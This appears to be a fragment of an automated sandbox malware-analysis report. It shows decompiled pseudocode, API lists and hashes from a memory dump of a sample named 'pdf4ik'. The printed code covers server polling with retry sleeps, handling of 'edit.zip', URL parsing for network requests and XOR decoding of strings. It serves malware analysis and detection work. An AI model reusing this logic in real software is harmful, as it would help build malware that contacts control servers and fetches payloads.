							} while (_t246 != 0);
							E29D892C0(_t238,  &_v280, _t175 - _t282);
							_t321 = _t320 - 0x1c;
							_v8 = 0x13;
							_v348 = _t321;
							E29D8E970(_t238, _t321);
							_v8 = _t232;
							E29D925A0();
							_t181 =  *0x29dd62cc; // 0x2bab2a50
							_t315 = _t321 + 0x54;
							_t344 =  *0x29dd62e0 - 0x10; // 0x1f
							if(_t344 < 0) {
								_t181 = 0x29dd62cc;
							}
							_push("ERROR");
							_push(_t181);
							if( *0x29dd8550() != 0) {
								_t183 = E29D8E9A0(_t238,  &_v308);
								_v8 = 0x24;
								E29D891D0(_t183, "edit.zip");
								_v8 = _t232;
								_t236 = 0x10;
								__eflags = _v288 - 0x10;
								if(_v288 >= 0x10) {
									_t246 = _v308;
									_push(_v308);
									E29DADF3B();
									_t315 = _t315 + 4;
								}
								_t185 = E29D8E910(_t238,  &_v308);
								_v8 = 0x25;
								goto L54;
							} else {
								_t188 =  *0x29dd62cc; // 0x2bab2a50
								_t346 =  *0x29dd62e0 - 0x10; // 0x1f
								if(_t346 < 0) {
									_t188 = 0x29dd62cc;
								}
								_push("ERROR");
								_push(_t188);
								if( *0x29dd8550() != 0) {
									_t190 = E29D8E9D0(_t238,  &_v308);
									_v8 = 0x2e;
									E29D891D0(_t190, "edit.zip");
									_v8 = _t232;
									_t233 = 0x10;
									__eflags = _v288 - 0x10;
									if(_v288 >= 0x10) {
										_push(_v308);
										E29DADF3B();
										_t315 = _t315 + 4;
									}
									_t155 = E29D8EA00(_t238,  &_v308);
									_v8 = 0x2f;
									goto L73;
								} else {
									_t194 =  *0x29dd62cc; // 0x2bab2a50
									_t348 =  *0x29dd62e0 - 0x10; // 0x1f
									if(_t348 < 0) {
										_t194 = 0x29dd62cc;
									}
									_push("ERROR");
									_push(_t194);
									if( *0x29dd8550() != 0) {
										_t196 = E29D8EA00(_t238,  &_v308);
										_v8 = 0x38;
										E29D891D0(_t196, "edit.zip");
										_v8 = _t232;
										_t235 = 0x10;
										__eflags = _v288 - 0x10;
										if(_v288 >= 0x10) {
											_t238 = _v308;
											_push(_v308);
											E29DADF3B();
											_t315 = _t315 + 4;
										}
										_t172 = E29D8EA00(_t238,  &_v308);
										_v8 = 0x39;
										L59:
										_t156 = E29D891D0(_t172, 0x29dd6304);
										__eflags = _v288 - _t235;
										if(_v288 >= _t235) {
											_t246 = _v308;
											_push(_v308);
											goto L75;
										}
									} else {
										_t199 =  *0x29dd62cc; // 0x2bab2a50
										_t350 =  *0x29dd62e0 - 0x10; // 0x1f
										if(_t350 < 0) {
											_t199 = 0x29dd62cc;
										}
										_push("ERROR");
										_push(_t199);
										if( *0x29dd8550() != 0) {
											_t201 = E29D8EA00(_t238,  &_v308);
											_v8 = 0x42;
											E29D891D0(_t201, "edit.zip");
											_v8 = _t232;
											_t236 = 0x10;
											__eflags = _v288 - 0x10;
											if(_v288 >= 0x10) {
												_t246 = _v308;
												_push(_v308);
												E29DADF3B();
												_t315 = _t315 + 4;
											}
											_t185 = E29D8EA00(_t238,  &_v308);
											_v8 = 0x43;
											L54:
											_t156 = E29D891D0(_t185, 0x29dd6304);
											__eflags = _v288 - _t236;
											if(_v288 >= _t236) {
												_push(_v308);
												goto L75;
											}
										} else {
											_t204 =  *0x29dd62cc; // 0x2bab2a50
											_t352 =  *0x29dd62e0 - 0x10; // 0x1f
											if(_t352 < 0) {
												_t204 = 0x29dd62cc;
											}
											_push("ERROR");
											_push(_t204);
											if( *0x29dd8550() != 0) {
												_t206 = E29D8EA00(_t238,  &_v308);
												_v8 = 0x4c;
												E29D891D0(_t206, "edit.zip");
												_v8 = _t232;
												_t233 = 0x10;
												__eflags = _v288 - 0x10;
												if(_v288 >= 0x10) {
													_push(_v308);
													E29DADF3B();
													_t315 = _t315 + 4;
												}
												_t155 = E29D8EA00(_t238,  &_v308);
												_v8 = 0x4d;
												L73:
												_t156 = E29D891D0(_t155, 0x29dd6304);
												__eflags = _v288 - _t233;
												if(_v288 >= _t233) {
													_push(_v308);
													goto L75;
												}
											} else {
												_t210 =  *0x29dd62cc; // 0x2bab2a50
												_t354 =  *0x29dd62e0 - 0x10; // 0x1f
												if(_t354 < 0) {
													_t210 = 0x29dd62cc;
												}
												_t211 =  *0x29dd8550(_t210, "ERROR");
												_t328 = _t211;
												if(_t211 != 0) {
													_t212 = E29D8EA00(_t238,  &_v308);
													_v8 = 0x4e;
													E29D891D0(_t212, "edit.zip");
													_v8 = _t232;
													__eflags = _v288 - 0x10;
													if(_v288 >= 0x10) {
														_t238 = _v308;
														_push(_v308);
														E29DADF3B();
														_t315 = _t315 + 4;
													}
													_t214 = E29D8EA00(_t238,  &_v336);
													_v8 = 0x4f;
													_t156 = E29D891D0(_t214, 0x29dd6304);
													__eflags = _v316 - 0x10;
													if(_v316 >= 0x10) {
														_t246 = _v336;
														_push(_v336);
														L75:
														_t156 = E29DADF3B();
													}
												} else {
													Sleep(0xea60);
													continue;
												}
											}
										}
									}
								}
							}
						}
					}
					 *[fs:0x0] = _v16;
					_pop(_t252);
					_pop(_t272);
					_pop(_t234);
					__eflags = _v20 ^ _t309;
					return E29DADF46(_t156, _t234, _v20 ^ _t309, _t246, _t252, _t272);
				}
			}





























































































                                        0x29d93e33
                                        0x29d93e35
                                        0x29d93e40
                                        0x29d93e47
                                        0x29d93e4c
                                        0x29d93e4e
                                        0x29d93e51
                                        0x29d93e54
                                        0x29d93e58
                                        0x29d93e6c
                                        0x29d93e71
                                        0x29d93e79
                                        0x29d93e80
                                        0x29d93e86
                                        0x29d93e86
                                        0x29d93e90
                                        0x29d93e90
                                        0x29d93e95
                                        0x29d93e9a
                                        0x29d93ea0
                                        0x29d93ea5
                                        0x29d93ea8
                                        0x29d93eb1
                                        0x29d93eb7
                                        0x29d93ec2
                                        0x29d93ec6
                                        0x29d93ecb
                                        0x29d93ed3
                                        0x29d93ed4
                                        0x29d93ed8
                                        0x29d93edd
                                        0x29d93ee2
                                        0x29d93ee5
                                        0x29d93eee
                                        0x29d93ef0
                                        0x29d93ef6
                                        0x29d93ef7
                                        0x29d93efc
                                        0x29d93efc
                                        0x29d93eff
                                        0x29d93f09
                                        0x29d93f0f
                                        0x29d93f19
                                        0x29d93f20
                                        0x29d93f26
                                        0x29d93f28
                                        0x29d93f28
                                        0x29d93f2d
                                        0x29d93f32
                                        0x29d93f3b
                                        0x00000000
                                        0x00000000
                                        0x29d93f41
                                        0x29d93f46
                                        0x29d93f4c
                                        0x29d93f51
                                        0x29d93f54
                                        0x29d93f5b
                                        0x29d93f5d
                                        0x29d93f63
                                        0x29d93f66
                                        0x29d93f6d
                                        0x29d93f73
                                        0x29d93f76
                                        0x29d93f80
                                        0x29d93f80
                                        0x29d93f82
                                        0x29d93f83
                                        0x29d93f91
                                        0x29d93f96
                                        0x29d93f99
                                        0x29d93f9b
                                        0x29d93f9f
                                        0x29d93fa8
                                        0x29d93fab
                                        0x29d93fb7
                                        0x29d93fba
                                        0x29d93fbf
                                        0x29d93fc2
                                        0x29d93fc7
                                        0x29d93fca
                                        0x29d93fcf
                                        0x29d93fcf
                                        0x29d93fd4
                                        0x29d93fda
                                        0x29d93fdc
                                        0x29d93fdc
                                        0x29d93fe7
                                        0x29d93fed
                                        0x29d93fef
                                        0x29d94569
                                        0x29d94575
                                        0x29d9457c
                                        0x29d94581
                                        0x29d94584
                                        0x29d94589
                                        0x29d9458f
                                        0x29d94597
                                        0x29d94598
                                        0x29d9459d
                                        0x29d9459d
                                        0x29d945a6
                                        0x29d945ab
                                        0x00000000
                                        0x29d93ff5
                                        0x29d93ff5
                                        0x29d93ffa
                                        0x29d93fff
                                        0x29d94005
                                        0x29d9400a
                                        0x29d9400d
                                        0x29d94016
                                        0x29d9401c
                                        0x29d94027
                                        0x29d9402b
                                        0x29d94030
                                        0x29d94038
                                        0x29d94039
                                        0x29d9403d
                                        0x29d94042
                                        0x29d94047
                                        0x29d9404a
                                        0x29d94053
                                        0x29d94055
                                        0x29d9405b
                                        0x29d9405c
                                        0x29d94061
                                        0x29d94061
                                        0x29d94064
                                        0x29d94069
                                        0x29d9406f
                                        0x29d94079
                                        0x29d94080
                                        0x29d94086
                                        0x29d94088
                                        0x29d94088
                                        0x29d9408d
                                        0x29d94092
                                        0x29d9409b
                                        0x29d940a1
                                        0x29d940a6
                                        0x29d940ac
                                        0x29d940b1
                                        0x29d940b4
                                        0x29d940bb
                                        0x29d940bd
                                        0x29d940c3
                                        0x29d940c6
                                        0x29d940cd
                                        0x29d940d3
                                        0x29d940d6
                                        0x29d940e0
                                        0x29d940e0
                                        0x29d940e2
                                        0x29d940e3
                                        0x29d940ea
                                        0x29d940f1
                                        0x29d940f6
                                        0x29d940f9
                                        0x29d940fb
                                        0x29d940ff
                                        0x29d94108
                                        0x29d9410b
                                        0x29d94117
                                        0x29d9411a
                                        0x29d9411f
                                        0x29d94122
                                        0x29d94127
                                        0x29d9412a
                                        0x29d9412a
                                        0x29d9412f
                                        0x29d94134
                                        0x29d9413a
                                        0x29d9413c
                                        0x29d9413c
                                        0x29d94141
                                        0x29d94146
                                        0x29d9414f
                                        0x29d94515
                                        0x29d94521
                                        0x29d94528
                                        0x29d9452d
                                        0x29d94530
                                        0x29d94535
                                        0x29d9453b
                                        0x29d9453d
                                        0x29d94543
                                        0x29d94544
                                        0x29d94549
                                        0x29d94549
                                        0x29d94552
                                        0x29d94557
                                        0x00000000
                                        0x29d94155
                                        0x29d94155
                                        0x29d9415a
                                        0x29d94160
                                        0x29d94165
                                        0x29d94168
                                        0x29d9416f
                                        0x29d94171
                                        0x29d94177
                                        0x29d9417a
                                        0x29d94181
                                        0x29d94187
                                        0x29d9418a
                                        0x29d94190
                                        0x29d94190
                                        0x29d94192
                                        0x29d94193
                                        0x29d941a1
                                        0x29d941a6
                                        0x29d941a9
                                        0x29d941af
                                        0x29d941b5
                                        0x29d941ba
                                        0x29d941bd
                                        0x29d941c2
                                        0x29d941cc
                                        0x29d941cf
                                        0x29d941d5
                                        0x29d941d7
                                        0x29d941d7
                                        0x29d941dc
                                        0x29d941e1
                                        0x29d941ea
                                        0x29d944c1
                                        0x29d944cd
                                        0x29d944d4
                                        0x29d944d9
                                        0x29d944dc
                                        0x29d944e1
                                        0x29d944e7
                                        0x29d944e9
                                        0x29d944ef
                                        0x29d944f0
                                        0x29d944f5
                                        0x29d944f5
                                        0x29d944fe
                                        0x29d94503
                                        0x00000000
                                        0x29d941f0
                                        0x29d941f0
                                        0x29d941f5
                                        0x29d941fb
                                        0x29d941fd
                                        0x29d941fd
                                        0x29d94202
                                        0x29d94207
                                        0x29d94210
                                        0x29d9446d
                                        0x29d94479
                                        0x29d94480
                                        0x29d94485
                                        0x29d94488
                                        0x29d9448d
                                        0x29d94493
                                        0x29d9449b
                                        0x29d9449c
                                        0x29d944a1
                                        0x29d944a1
                                        0x29d944aa
                                        0x29d944af
                                        0x00000000
                                        0x29d94216
                                        0x29d94216
                                        0x29d9421b
                                        0x29d94221
                                        0x29d94223
                                        0x29d94223
                                        0x29d94228
                                        0x29d9422d
                                        0x29d94236
                                        0x29d943fa
                                        0x29d94406
                                        0x29d9440d
                                        0x29d94412
                                        0x29d94415
                                        0x29d9441a
                                        0x29d94420
                                        0x29d94422
                                        0x29d94428
                                        0x29d94429
                                        0x29d9442e
                                        0x29d9442e
                                        0x29d94437
                                        0x29d9443c
                                        0x29d94443
                                        0x29d9444a
                                        0x29d9444f
                                        0x29d94455
                                        0x29d9445b
                                        0x29d94461
                                        0x00000000
                                        0x29d94461
                                        0x29d9423c
                                        0x29d9423c
                                        0x29d94241
                                        0x29d94247
                                        0x29d94249
                                        0x29d94249
                                        0x29d9424e
                                        0x29d94253
                                        0x29d9425c
                                        0x29d94387
                                        0x29d94393
                                        0x29d9439a
                                        0x29d9439f
                                        0x29d943a2
                                        0x29d943a7
                                        0x29d943ad
                                        0x29d943af
                                        0x29d943b5
                                        0x29d943b6
                                        0x29d943bb
                                        0x29d943bb
                                        0x29d943c4
                                        0x29d943c9
                                        0x29d943d0
                                        0x29d943d7
                                        0x29d943dc
                                        0x29d943e2
                                        0x29d943ee
                                        0x00000000
                                        0x29d943ee
                                        0x29d94262
                                        0x29d94262
                                        0x29d94267
                                        0x29d9426d
                                        0x29d9426f
                                        0x29d9426f
                                        0x29d94274
                                        0x29d94279
                                        0x29d94282
                                        0x29d94333
                                        0x29d9433f
                                        0x29d94346
                                        0x29d9434b
                                        0x29d9434e
                                        0x29d94353
                                        0x29d94359
                                        0x29d94361
                                        0x29d94362
                                        0x29d94367
                                        0x29d94367
                                        0x29d94370
                                        0x29d94375
                                        0x29d945b2
                                        0x29d945b9
                                        0x29d945be
                                        0x29d945c4
                                        0x29d945cc
                                        0x00000000
                                        0x29d945cc
                                        0x29d94288
                                        0x29d94288
                                        0x29d9428d
                                        0x29d94293
                                        0x29d94295
                                        0x29d94295
                                        0x29d942a0
                                        0x29d942a6
                                        0x29d942a8
                                        0x29d942c0
                                        0x29d942cc
                                        0x29d942d3
                                        0x29d942d8
                                        0x29d942e0
                                        0x29d942e6
                                        0x29d942e8
                                        0x29d942ee
                                        0x29d942ef
                                        0x29d942f4
                                        0x29d942f4
                                        0x29d942fd
                                        0x29d94309
                                        0x29d94310
                                        0x29d94315
                                        0x29d9431b
                                        0x29d94321
                                        0x29d94327
                                        0x29d945cd
                                        0x29d945cd
                                        0x29d945d2
                                        0x29d942aa
                                        0x29d942af
                                        0x00000000
                                        0x29d942af
                                        0x29d942a8
                                        0x29d94282
                                        0x29d9425c
                                        0x29d94236
                                        0x29d94210
                                        0x29d941ea
                                        0x29d9414f
                                        0x29d945d8
                                        0x29d945e0
                                        0x29d945e1
                                        0x29d945e2
                                        0x29d945e6
                                        0x29d945f0
                                        0x29d945f0

                                        APIs
                                        • _memset.LIBCMT ref: 29D93E6C
                                        • lstrcatA.KERNEL32(?,29DCFC34), ref: 29D93E80
                                          • Part of subcall function 29D923B0: StrCmpCA.SHLWAPI(?,ERROR), ref: 29D92491
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D93F33
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D93FE7
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94093
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94147
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D941E2
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94208
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D9422E
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94254
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D9427A
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D942A0
                                        • Sleep.KERNEL32(0000EA60), ref: 29D942AF
                                          • Part of subcall function 29D891D0: _memmove.LIBCMT ref: 29D89203
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep_memmove_memsetlstrcat
                                        • String ID: %$ERROR$edit.zip
                                        • API String ID: 801833505-3780004840
                                        • Opcode ID: e879e65e4bca1cf1ed29448370f1a562d445ccc8533f85e4ef401708c959975f
                                        • Instruction ID: 02e5e964b2044a426c077f5626eaf3db2d13af632c886e20f81fac4d25df4fc0
                                        • Opcode Fuzzy Hash: e879e65e4bca1cf1ed29448370f1a562d445ccc8533f85e4ef401708c959975f
                                        • Instruction Fuzzy Hash: B9128BB2D10268ABDB10EF64C9497CDBAB4BB15704F4085EDD508AB602C7749B4BEFE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D925A0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 179stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1948 29d925a0-29d925ec 1949 29d925ee 1948->1949 1950 29d925f1-29d9264f call 29db5640 * 2 lstrlenA InternetCrackUrlA 1948->1950 1949->1950 1955 29d92651 1950->1955 1956 29d92656-29d926d2 StrCmpCA call 29d894c0 * 2 call 29d91560 call 29d891d0 1950->1956 1955->1956 1965 29d926e3-29d926fa 1956->1965 1966 29d926d4-29d926e0 call 29dadf3b 1956->1966 1968 29d926fc 1965->1968 1969 29d926ff-29d92712 StrCmpCA 1965->1969 1966->1965 1968->1969 1971 29d92714-29d92726 call 29d894c0 1969->1971 1972 29d92736-29d9273d call 29d892c0 1969->1972 1977 29d92728 1971->1977 1978 29d9272b-29d9272c call 29d8ed40 1971->1978 1975 29d92742-29d9274b 1972->1975 1979 29d9274d 1975->1979 1980 29d92750-29d92755 1975->1980 1977->1978 1984 29d92731-29d92734 1978->1984 1979->1980 1982 29d92763-29d9276f 1980->1982 1983 29d92757-29d92760 call 29dadf3b 1980->1983 1986 29d9277d-29d92789 1982->1986 1987 29d92771-29d9277a call 29dadf3b 1982->1987 1983->1982 1984->1975 1988 29d9278b-29d92794 call 29dadf3b 1986->1988 1989 29d92797-29d927a3 1986->1989 1987->1986 1988->1989 1993 29d927b1-29d927cc call 29dadf46 1989->1993 1994 29d927a5-29d927ae call 29dadf3b 1989->1994 1994->1993
                                        C-Code - Quality: 37%
                                        			E29D925A0(CHAR* _a4, char _a20, intOrPtr _a24, char _a32, char _a48, intOrPtr _a52, char _a60, intOrPtr _a80) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v84;
				intOrPtr _v92;
				char _v96;
				char _v112;
				intOrPtr _v120;
				char _v124;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v200;
				char* _v204;
				void* _v208;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t70;
				int _t77;
				char* _t78;
				void* _t83;
				char* _t85;
				char* _t88;
				char* _t93;
				void* _t98;
				char* _t100;
				char* _t101;
				void* _t116;
				CHAR* _t118;
				void* _t121;
				signed int _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				char* _t126;
				char* _t127;
				void* _t128;

				_push(0xffffffff);
				_push(E29DC2C16);
				_push( *[fs:0x0]);
				_t124 = _t123 - 0xc0;
				_t69 =  *0x29dd5664; // 0xd9555f04
				_t70 = _t69 ^ _t122;
				_v20 = _t70;
				_push(_t70);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_v92 = 0xf;
				_v96 = 0;
				_v112 = 0;
				_v8 = 3;
				_t118 = _a4;
				if(_a24 < 0x10) {
					_t118 =  &_a4;
				}
				E29DB5640( &_v84, 0, 0x40);
				E29DB5640( &_v208, 0, 0x3c);
				_t125 = _t124 + 0x18;
				_v208 = 0x3c;
				_v204 =  &_v84;
				_v200 = 0x40;
				_t77 = InternetCrackUrlA(_t118, lstrlenA(_t118), 0x10000000,  &_v208);
				_t131 = _t77;
				_t78 = _v204;
				if(_t77 == 0) {
					_t78 = "http";
				}
				 *0x29dd8550(_t78, "https");
				_t126 = _t125 - 0x1c;
				_t100 = _t126;
				_v148 = _t126;
				_t111 =  &_a60;
				 *((intOrPtr*)(_t100 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t100 + 0x10)) = 0;
				 *_t100 = 0;
				E29D894C0(_t100,  &_a60, 0, 0xffffffff);
				_push(0);
				_t127 = _t126 - 0x1c;
				_t101 = _t127;
				_v144 = _t127;
				_v8 = 4;
				 *((intOrPtr*)(_t101 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t101 + 0x10)) = 0;
				 *_t101 = 0;
				E29D894C0(_t101,  &_a4, 0, 0xffffffff);
				_push( &_v140);
				_v8 = 3;
				_t83 = E29D91560(_t131); // executed
				_t128 = _t127 + 0x40;
				_v8 = 5;
				E29D891D0(_t83,  &_v112);
				_v8 = 3;
				if(_v120 >= 0x10) {
					_t111 = _v140;
					_push(_v140);
					E29DADF3B();
					_t128 = _t128 + 4;
				}
				_t85 = _v112;
				_v120 = 0xf;
				_v124 = 0;
				_v140 = 0;
				if(_v92 < 0x10) {
					_t85 =  &_v112;
				}
				_push("ERROR");
				_push(_t85);
				if( *0x29dd8550() == 0) {
					E29D892C0(0x29dd62cc, "ERROR", 5);
				} else {
					E29D894C0(0x29dd62cc,  &_a4, 0, 0xffffffff);
					_t93 = _v112;
					_t135 = _v92 - 0x10;
					if(_v92 < 0x10) {
						_t93 =  &_v112;
					}
					E29D8ED40(0, 0xf, _t135, _t93); // executed
					_t128 = _t128 + 4;
				}
				_t88 = _v112;
				_v96 = 0;
				if(_v92 < 0x10) {
					_t88 =  &_v112;
				}
				 *_t88 = 0;
				if(_v92 >= 0x10) {
					_push(_v112);
					_t88 = E29DADF3B();
					_t128 = _t128 + 4;
				}
				_v92 = 0xf;
				_v96 = 0;
				_v112 = 0;
				if(_a24 >= 0x10) {
					_t111 = _a4;
					_push(_a4);
					_t88 = E29DADF3B();
					_t128 = _t128 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a52 >= 0x10) {
					_push(_a32);
					_t88 = E29DADF3B();
					_t128 = _t128 + 4;
				}
				_a52 = 0xf;
				_a48 = 0;
				_a32 = 0;
				if(_a80 >= 0x10) {
					_push(_a60);
					_t88 = E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t116);
				_pop(_t121);
				_pop(_t98);
				return E29DADF46(_t88, _t98, _v20 ^ _t122, _t111, _t116, _t121);
			}










































                                        0x29d925a3
                                        0x29d925a5
                                        0x29d925b0
                                        0x29d925b1
                                        0x29d925b7
                                        0x29d925bc
                                        0x29d925be
                                        0x29d925c4
                                        0x29d925c8
                                        0x29d925d0
                                        0x29d925d8
                                        0x29d925db
                                        0x29d925de
                                        0x29d925e1
                                        0x29d925e9
                                        0x29d925ec
                                        0x29d925ee
                                        0x29d925ee
                                        0x29d925f8
                                        0x29d92607
                                        0x29d9260c
                                        0x29d9261f
                                        0x29d92629
                                        0x29d9262f
                                        0x29d92641
                                        0x29d92647
                                        0x29d92649
                                        0x29d9264f
                                        0x29d92651
                                        0x29d92651
                                        0x29d9265c
                                        0x29d92662
                                        0x29d92665
                                        0x29d92667
                                        0x29d92670
                                        0x29d92673
                                        0x29d92676
                                        0x29d9267a
                                        0x29d9267c
                                        0x29d92681
                                        0x29d92682
                                        0x29d92685
                                        0x29d92687
                                        0x29d9268f
                                        0x29d92697
                                        0x29d9269a
                                        0x29d9269e
                                        0x29d926a0
                                        0x29d926ab
                                        0x29d926ac
                                        0x29d926b0
                                        0x29d926b5
                                        0x29d926bd
                                        0x29d926c1
                                        0x29d926cb
                                        0x29d926d2
                                        0x29d926d4
                                        0x29d926da
                                        0x29d926db
                                        0x29d926e0
                                        0x29d926e0
                                        0x29d926e3
                                        0x29d926eb
                                        0x29d926ee
                                        0x29d926f1
                                        0x29d926fa
                                        0x29d926fc
                                        0x29d926fc
                                        0x29d926ff
                                        0x29d92704
                                        0x29d92712
                                        0x29d9273d
                                        0x29d92714
                                        0x29d9271b
                                        0x29d92720
                                        0x29d92723
                                        0x29d92726
                                        0x29d92728
                                        0x29d92728
                                        0x29d9272c
                                        0x29d92731
                                        0x29d92731
                                        0x29d92742
                                        0x29d92745
                                        0x29d9274b
                                        0x29d9274d
                                        0x29d9274d
                                        0x29d92750
                                        0x29d92755
                                        0x29d9275a
                                        0x29d9275b
                                        0x29d92760
                                        0x29d92760
                                        0x29d92763
                                        0x29d92766
                                        0x29d92769
                                        0x29d9276f
                                        0x29d92771
                                        0x29d92774
                                        0x29d92775
                                        0x29d9277a
                                        0x29d9277a
                                        0x29d9277d
                                        0x29d92780
                                        0x29d92783
                                        0x29d92789
                                        0x29d9278e
                                        0x29d9278f
                                        0x29d92794
                                        0x29d92794
                                        0x29d92797
                                        0x29d9279a
                                        0x29d9279d
                                        0x29d927a3
                                        0x29d927a8
                                        0x29d927a9
                                        0x29d927ae
                                        0x29d927b4
                                        0x29d927bc
                                        0x29d927bd
                                        0x29d927be
                                        0x29d927cc

                                        APIs
                                        • _memset.LIBCMT ref: 29D925F8
                                        • _memset.LIBCMT ref: 29D92607
                                        • lstrlenA.KERNEL32(?,10000000,?,?,?,D9555F04), ref: 29D92639
                                        • InternetCrackUrlA.WININET(?,00000000), ref: 29D92641
                                        • StrCmpCA.SHLWAPI(?,https,?,?,D9555F04), ref: 29D9265C
                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 29D92705
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$CrackInternetlstrlen
                                        • String ID: <$@$ERROR$http$https
                                        • API String ID: 3332450456-156369483
                                        • Opcode ID: c063da12de62c4f105b81544693420fdccc3f43ce393a585bd71db305d580554
                                        • Instruction ID: d4c0b01c65ea875aad4b90cf38f00c3709c3b4eefddc291258b766457054c617
                                        • Opcode Fuzzy Hash: c063da12de62c4f105b81544693420fdccc3f43ce393a585bd71db305d580554
                                        • Instruction Fuzzy Hash: 7C6199B1C01248EBDB01DF99C880BCEBB78FF14750F50819EE519AB641D7349A46DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D84750 Relevance: 18.1, APIs: 12, Instructions: 91stringmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2001 29d84750-29d8477c 2002 29d84782-29d84787 2001->2002 2002->2002 2003 29d84789-29d847f7 lstrcatA lstrlenA * 2 LocalAlloc lstrlenA * 4 2002->2003 2004 29d847f9-29d847fe 2003->2004 2005 29d8484c-29d84867 lstrlenA call 29dadf46 2003->2005 2006 29d84804-29d8484a lstrlenA * 3 2004->2006 2006->2005 2006->2006
                                        C-Code - Quality: 94%
                                        			E29D84750(intOrPtr __ecx, intOrPtr _a4, CHAR* _a8) {
				signed int _v8;
				char _v1008;
				void* _v1012;
				intOrPtr _v1016;
				CHAR* _v1020;
				intOrPtr _v1024;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				char* _t37;
				void* _t42;
				signed int _t55;
				void* _t61;
				void* _t64;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t83;

				_t34 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t34 ^ _t83;
				_t80 = __ecx;
				_v1020 = _a8;
				_v1016 = __ecx;
				_t64 = 0x3e8;
				_t37 =  &_v1008;
				do {
					 *_t37 = 0;
					_t37 = _t37 + 1;
					_t64 = _t64 - 1;
				} while (_t64 != 0);
				lstrcatA( &_v1008, 0x29dcd598);
				_t82 = lstrlenA;
				lstrlenA( &_v1008);
				lstrlenA( &_v1008);
				_t42 = LocalAlloc(0x40, _t80 + 1); // executed
				_t61 = _t42;
				_v1012 = _t61;
				lstrlenA( &_v1008);
				lstrlenA( &_v1008);
				 *((char*)(_t80 + _t61)) = 0;
				lstrlenA( &_v1008);
				_t77 =  &_v1008;
				lstrlenA( &_v1008);
				_t81 = 0;
				if(_v1016 > 0) {
					_v1024 = _a4 - _t61;
					do {
						lstrlenA( &_v1008);
						_t55 = lstrlenA(_v1020);
						_t77 = _v1024;
						 *(_t61 + _t81) = _v1020[_t81 % _t55] ^  *(_v1024 + _t61 + _t81);
						lstrlenA( &_v1008);
						_t61 = _v1012;
						_t81 = _t81 + 1;
					} while (_t81 < _v1016);
				}
				lstrlenA( &_v1008);
				return E29DADF46(_t61, _t61, _v8 ^ _t83, _t77, _t81, _t82);
			}






















                                        0x29d84759
                                        0x29d84760
                                        0x29d84769
                                        0x29d8476b
                                        0x29d84771
                                        0x29d84777
                                        0x29d8477c
                                        0x29d84782
                                        0x29d84782
                                        0x29d84785
                                        0x29d84786
                                        0x29d84786
                                        0x29d84795
                                        0x29d8479b
                                        0x29d847a8
                                        0x29d847b1
                                        0x29d847b9
                                        0x29d847c5
                                        0x29d847c8
                                        0x29d847ce
                                        0x29d847d7
                                        0x29d847e0
                                        0x29d847e4
                                        0x29d847e6
                                        0x29d847ed
                                        0x29d847ef
                                        0x29d847f7
                                        0x29d847fe
                                        0x29d84804
                                        0x29d8480b
                                        0x29d84816
                                        0x29d84829
                                        0x29d84839
                                        0x29d8483b
                                        0x29d8483d
                                        0x29d84843
                                        0x29d84844
                                        0x29d84804
                                        0x29d84853
                                        0x29d84867

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocLocallstrcat
                                        • String ID:
                                        • API String ID: 3085635063-0
                                        • Opcode ID: 28435fecefe41e7cd82ca9312987e46fd86f5befd63e0df1bb87871fceae363a
                                        • Instruction ID: dca5ca90d0bf86585013302c7b06edb0081fac8df9eb2951cb57117a39fdd2ce
                                        • Opcode Fuzzy Hash: 28435fecefe41e7cd82ca9312987e46fd86f5befd63e0df1bb87871fceae363a
                                        • Instruction Fuzzy Hash: A6316171D1026E9BCB26DF68CCD0AAEB7FDEF49200F0091EAA509D3144DA346B469F90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

